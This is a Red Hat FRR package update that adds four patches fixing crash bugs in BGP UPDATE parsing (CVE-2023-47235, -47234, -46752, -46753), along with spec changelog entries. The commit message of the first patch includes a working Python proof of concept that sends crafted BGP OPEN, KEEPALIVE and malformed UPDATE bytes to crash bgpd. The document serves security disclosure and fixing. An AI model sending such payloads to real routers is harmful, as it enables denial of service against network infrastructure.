Resolves: RHEL-14825 - crafted BGP UPDATE message leading to a crash

Resolves: RHEL-15918 - crash from malformed EOR-containing BGP UPDATE message

.frr.metadata

@@ -0,0 +1,2 @@
+5f46099a744058de374dbbf5240d1c4292a143f2 frr-8.5.3.tar.gz
+f9cc2bf16aa26b5090d782b70111f511cb276de1 remove-babeld-ldpd.sh

0005-CVE-2023-47235.patch

@@ -0,0 +1,110 @@
+From 71422bfe269e34b69d78f9fb02f30426f2fdef48 Mon Sep 17 00:00:00 2001
+From: rpm-build <rpm-build>
+Date: Wed, 13 Dec 2023 16:59:46 +0100
+Subject: [PATCH] bgpd: Treat EOR as withdrawn to avoid unwanted handling of 
+ malformed attrs
+
+Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be
+processed as a normal UPDATE without mandatory attributes, that could lead
+to harmful behavior. In this case, a crash for route-maps with the configuration
+such as:
+
+```
+router bgp 65001
+ no bgp ebgp-requires-policy
+ neighbor 127.0.0.1 remote-as external
+ neighbor 127.0.0.1 passive
+ neighbor 127.0.0.1 ebgp-multihop
+ neighbor 127.0.0.1 disable-connected-check
+ neighbor 127.0.0.1 update-source 127.0.0.2
+ neighbor 127.0.0.1 timers 3 90
+ neighbor 127.0.0.1 timers connect 1
+ !
+ address-family ipv4 unicast
+  neighbor 127.0.0.1 addpath-tx-all-paths
+  neighbor 127.0.0.1 default-originate
+  neighbor 127.0.0.1 route-map RM_IN in
+ exit-address-family
+exit
+!
+route-map RM_IN permit 10
+ set as-path prepend 200
+exit
+```
+
+Send a malformed optional transitive attribute:
+
+```
+import socket
+import time
+
+OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02"
+b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02"
+b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00"
+b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d"
+b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01"
+b"\x80\x00\x00\x00")
+
+KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+b"\xff\xff\xff\xff\xff\xff\x00\x13\x04")
+
+UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b")
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(('127.0.0.2', 179))
+s.send(OPEN)
+data = s.recv(1024)
+s.send(KEEPALIVE)
+data = s.recv(1024)
+s.send(UPDATE)
+data = s.recv(1024)
+time.sleep(100)
+s.close()
+```
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
+
+(cherry picked from commit 6814f2e0138a6ea5e1f83bdd9085d9a77999900b)
+---
+ bgpd/bgp_attr.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
+index a121911..12a6953 100644
+--- a/bgpd/bgp_attr.c
++++ b/bgpd/bgp_attr.c
+@@ -3079,9 +3079,12 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr)
+ 	uint8_t type = 0;
+ 
+ 	/* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an
+-	 * empty UPDATE.  */
++	 * empty UPDATE. Treat-as-withdraw, otherwise if we just ignore it,
++	 * we will pass it to be processed as a normal UPDATE without mandatory
++	 * attributes, that could lead to harmful behavior.
++	 */
+ 	if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag)
+-		return BGP_ATTR_PARSE_PROCEED;
++		return BGP_ATTR_PARSE_WITHDRAW;
+ 
+ 	/* "An UPDATE message that contains the MP_UNREACH_NLRI is not required
+ 	   to carry any other path attributes.", though if MP_REACH_NLRI or NLRI
+@@ -3507,7 +3510,13 @@ done:
+ 	aspath_unintern(&as4_path);
+ 
+ 	transit = bgp_attr_get_transit(attr);
+-	if (ret != BGP_ATTR_PARSE_ERROR) {
++	/* If we received an UPDATE with mandatory attributes, then
++	 * the unrecognized transitive optional attribute of that
++	 * path MUST be passed. Otherwise, it's an error, and from
++	 * security perspective it might be very harmful if we continue
++	 * here with the unrecognized attributes.
++	 */
++	if (ret == BGP_ATTR_PARSE_PROCEED) {
+ 		/* Finally intern unknown attribute. */
+ 		if (transit)
+ 			bgp_attr_set_transit(attr, transit_intern(transit));
+-- 
+2.43.0
+

0006-CVE-2023-47234.patch

@@ -0,0 +1,95 @@
+From 7fe95b24333cceb6cd04595694cd502fcd3666f6 Mon Sep 17 00:00:00 2001
+From: rpm-build <rpm-build>
+Date: Wed, 13 Dec 2023 18:25:48 +0100
+Subject: [PATCH] bgpd: Ignore handling NLRIs if we received MP_UNREACH_NLRI
+
+If we receive MP_UNREACH_NLRI, we should stop handling remaining NLRIs if
+no mandatory path attributes received.
+
+In other words, if MP_UNREACH_NLRI received, the remaining NLRIs should be handled
+as a new data, but without mandatory attributes, it's a malformed packet.
+
+In normal case, this MUST not happen at all, but to avoid crashing bgpd, we MUST
+handle that.
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
+Signed-off-by: Christian Breunig <christian@breunig.cc>
+
+(cherry picked from commit c37119df45bbf4ef713bc10475af2ee06e12f3bf)
+---
+ bgpd/bgp_attr.c   | 19 ++++++++++---------
+ bgpd/bgp_attr.h   |  1 +
+ bgpd/bgp_packet.c |  7 ++++++-
+ 3 files changed, 17 insertions(+), 10 deletions(-)
+
+diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
+index 12a6953..8b02f2c 100644
+--- a/bgpd/bgp_attr.c
++++ b/bgpd/bgp_attr.c
+@@ -3086,15 +3086,6 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr)
+ 	if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag)
+ 		return BGP_ATTR_PARSE_WITHDRAW;
+ 
+-	/* "An UPDATE message that contains the MP_UNREACH_NLRI is not required
+-	   to carry any other path attributes.", though if MP_REACH_NLRI or NLRI
+-	   are present, it should.  Check for any other attribute being present
+-	   instead.
+-	 */
+-	if ((!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) &&
+-	     CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI))))
+-		return BGP_ATTR_PARSE_PROCEED;
+-
+ 	if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN)))
+ 		type = BGP_ATTR_ORIGIN;
+ 
+@@ -3113,6 +3104,16 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr)
+ 	    && !CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_LOCAL_PREF)))
+ 		type = BGP_ATTR_LOCAL_PREF;
+ 
++	/* An UPDATE message that contains the MP_UNREACH_NLRI is not required
++	 * to carry any other path attributes. Though if MP_REACH_NLRI or NLRI
++	 * are present, it should. Check for any other attribute being present
++	 * instead.
++	 */
++	if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) &&
++	    CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI)))
++		return type ? BGP_ATTR_PARSE_MISSING_MANDATORY
++			    : BGP_ATTR_PARSE_PROCEED;
++
+ 	/* If any of the well-known mandatory attributes are not present
+ 	 * in an UPDATE message, then "treat-as-withdraw" MUST be used.
+ 	 */
+diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h
+index 06f350b..b9dfec9 100644
+--- a/bgpd/bgp_attr.h
++++ b/bgpd/bgp_attr.h
+@@ -379,6 +379,7 @@ enum bgp_attr_parse_ret {
+ 	 */
+ 	BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3,
+ 	BGP_ATTR_PARSE_EOR = -4,
++	BGP_ATTR_PARSE_MISSING_MANDATORY = -5,
+ };
+ 
+ struct bpacket_attr_vec_arr;
+diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
+index a5f065a..cdf0734 100644
+--- a/bgpd/bgp_packet.c
++++ b/bgpd/bgp_packet.c
+@@ -1873,7 +1873,12 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size)
+ 	/* Network Layer Reachability Information. */
+ 	update_len = end - stream_pnt(s);
+ 
+-	if (update_len && attribute_len) {
++	/* If we received MP_UNREACH_NLRI attribute, but also NLRIs, then
++	 * NLRIs should be handled as a new data. Though, if we received
++	 * NLRIs without mandatory attributes, they should be ignored.
++	 */
++	if (update_len && attribute_len &&
++	    attr_parse_ret != BGP_ATTR_PARSE_MISSING_MANDATORY) {
+ 		/* Set NLRI portion to structure. */
+ 		nlris[NLRI_UPDATE].afi = AFI_IP;
+ 		nlris[NLRI_UPDATE].safi = SAFI_UNICAST;
+-- 
+2.43.0
+

0007-CVE-2023-46752.patch

@@ -0,0 +1,76 @@
+From b08afc81c60607a4f736f418f2e3eb06087f1a35 Mon Sep 17 00:00:00 2001
+From: Donatas Abraitis <donatas@opensourcerouting.org>
+Date: Fri, 20 Oct 2023 17:49:18 +0300
+Subject: [PATCH] bgpd: Handle MP_REACH_NLRI malformed packets with session
+ reset
+
+Avoid crashing bgpd.
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
+---
+ bgpd/bgp_attr.c   | 6 +-----
+ bgpd/bgp_attr.h   | 1 -
+ bgpd/bgp_packet.c | 6 +-----
+ 3 files changed, 2 insertions(+), 11 deletions(-)
+
+diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
+index 6925aff727e2..e7bb42a5d989 100644
+--- a/bgpd/bgp_attr.c
++++ b/bgpd/bgp_attr.c
+@@ -2421,7 +2421,7 @@ int bgp_mp_reach_parse(struct bgp_attr_parser_args *args,
+ 
+ 		mp_update->afi = afi;
+ 		mp_update->safi = safi;
+-		return BGP_ATTR_PARSE_EOR;
++		return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_MAL_ATTR, 0);
+ 	}
+ 
+ 	mp_update->afi = afi;
+@@ -3759,10 +3759,6 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr,
+ 			goto done;
+ 		}
+ 
+-		if (ret == BGP_ATTR_PARSE_EOR) {
+-			goto done;
+-		}
+-
+ 		if (ret == BGP_ATTR_PARSE_ERROR) {
+ 			flog_warn(EC_BGP_ATTRIBUTE_PARSE_ERROR,
+ 				  "%s: Attribute %s, parse error", peer->host,
+diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h
+index 961e5f122470..fc347e7a1b4b 100644
+--- a/bgpd/bgp_attr.h
++++ b/bgpd/bgp_attr.h
+@@ -364,7 +364,6 @@ enum bgp_attr_parse_ret {
+ 	/* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR
+ 	 */
+ 	BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3,
+-	BGP_ATTR_PARSE_EOR = -4,
+ 	BGP_ATTR_PARSE_MISSING_MANDATORY = -5,
+ };
+ 
+diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
+index b585591e2f69..5ecf343b6657 100644
+--- a/bgpd/bgp_packet.c
++++ b/bgpd/bgp_packet.c
+@@ -2397,8 +2397,7 @@ static int bgp_update_receive(struct peer_connection *connection,
+ 	 * Non-MP IPv4/Unicast EoR is a completely empty UPDATE
+ 	 * and MP EoR should have only an empty MP_UNREACH
+ 	 */
+-	if ((!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0)
+-	    || (attr_parse_ret == BGP_ATTR_PARSE_EOR)) {
++	if (!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) {
+ 		afi_t afi = 0;
+ 		safi_t safi;
+ 		struct graceful_restart_info *gr_info;
+@@ -2419,9 +2418,6 @@ static int bgp_update_receive(struct peer_connection *connection,
+ 			   && nlris[NLRI_MP_WITHDRAW].length == 0) {
+ 			afi = nlris[NLRI_MP_WITHDRAW].afi;
+ 			safi = nlris[NLRI_MP_WITHDRAW].safi;
+-		} else if (attr_parse_ret == BGP_ATTR_PARSE_EOR) {
+-			afi = nlris[NLRI_MP_UPDATE].afi;
+-			safi = nlris[NLRI_MP_UPDATE].safi;
+ 		}
+ 
+ 		if (afi && peer->afc[afi][safi]) {

0008-CVE-2023-46753.patch

@@ -0,0 +1,60 @@
+From d8482bf011cb2b173e85b65b4bf3d5061250cdb9 Mon Sep 17 00:00:00 2001
+From: Donatas Abraitis <donatas@opensourcerouting.org>
+Date: Mon, 23 Oct 2023 23:34:10 +0300
+Subject: [PATCH] bgpd: Check mandatory attributes more carefully for UPDATE
+ message
+
+If we send a crafted BGP UPDATE message without mandatory attributes, we do
+not check if the length of the path attributes is zero or not. We only check
+if attr->flag is at least set or not. Imagine we send only unknown transit
+attribute, then attr->flag is always 0. Also, this is true only if graceful-restart
+capability is received.
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
+---
+ bgpd/bgp_attr.c | 10 ++++++----
+ 1 file changed, 6 insertions(+), 4 deletions(-)
+
+diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
+index 26fd3de..bcc4424 100644
+--- a/bgpd/bgp_attr.c
++++ b/bgpd/bgp_attr.c
+@@ -3400,7 +3400,8 @@ bgp_attr_unknown(struct bgp_attr_parser_args *args)
+ }
+ 
+ /* Well-known attribute check. */
+-static int bgp_attr_check(struct peer *peer, struct attr *attr)
++static int bgp_attr_check(struct peer *peer, struct attr *attr,
++           bgp_size_t length)
+ {
+ 	uint8_t type = 0;
+ 
+@@ -3409,7 +3410,8 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr)
+ 	 * we will pass it to be processed as a normal UPDATE without mandatory
+ 	 * attributes, that could lead to harmful behavior.
+ 	 */
+-	if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag)
++	if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag &&
++      !length)
+ 		return BGP_ATTR_PARSE_WITHDRAW;
+ 
+ 	if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN)))
+@@ -3462,7 +3464,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr,
+ 	enum bgp_attr_parse_ret ret;
+ 	uint8_t flag = 0;
+ 	uint8_t type = 0;
+-	bgp_size_t length;
++	bgp_size_t length = 0;
+ 	uint8_t *startp, *endp;
+ 	uint8_t *attr_endp;
+ 	uint8_t seen[BGP_ATTR_BITMAP_SIZE];
+@@ -3785,7 +3787,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr,
+ 	}
+ 
+ 	/* Check all mandatory well-known attributes are present */
+-	ret = bgp_attr_check(peer, attr);
++	ret = bgp_attr_check(peer, attr, length);
+ 	if (ret < 0)
+ 		goto done;
+ 

frr.spec

@@ -7,7 +7,7 @@
 
 Name: frr
 Version: 8.5.3
-Release: 1%{?checkout}%{?dist}
+Release: 4%{?checkout}%{?dist}
 Summary: Routing daemon
 License: GPLv2+
 URL: http://www.frrouting.org
@@ -67,6 +67,10 @@ Patch0000: 0000-remove-babeld-and-ldpd.patch
 Patch0002: 0002-enable-openssl.patch
 Patch0003: 0003-disable-eigrp-crypto.patch
 Patch0004: 0004-fips-mode.patch
+Patch0005: 0005-CVE-2023-47235.patch
+Patch0006: 0006-CVE-2023-47234.patch
+Patch0007: 0007-CVE-2023-46752.patch
+Patch0008: 0008-CVE-2023-46753.patch
 
 %description
 FRRouting is free software that manages TCP/IP based routing protocols. It takes
@@ -272,6 +276,16 @@ make check PYTHON=%{__python3}
 %endif
 
 %changelog
+* Mon Feb 05 2024 Michal Ruprich <mruprich@redhat.com> - 8.5.3-4
+- Resolves: RHEL-14825 - crafted BGP UPDATE message leading to a crash
+
+* Mon Feb 05 2024 Michal Ruprich <mruprich@redhat.com> - 8.5.3-3
+- Resolves: RHEL-14822 - mishandled malformed data leading to a crash
+
+* Mon Dec 18 2023 Michal Ruprich <mruprich@redhat.com> - 8.5.3-2
+- Resolves: RHEL-15915 - crash from specially crafted MP_UNREACH_NLRI-containing BGP UPDATE message
+- Resolves: RHEL-15918 - crash from malformed EOR-containing BGP UPDATE message
+
 * Thu Nov 23 2023 Michal Ruprich <mruprich@redhat.com> - 8.5.3-1
 - Resolves: RHEL-15291 - Rebase FRR to version 8.5.3 in RHEL9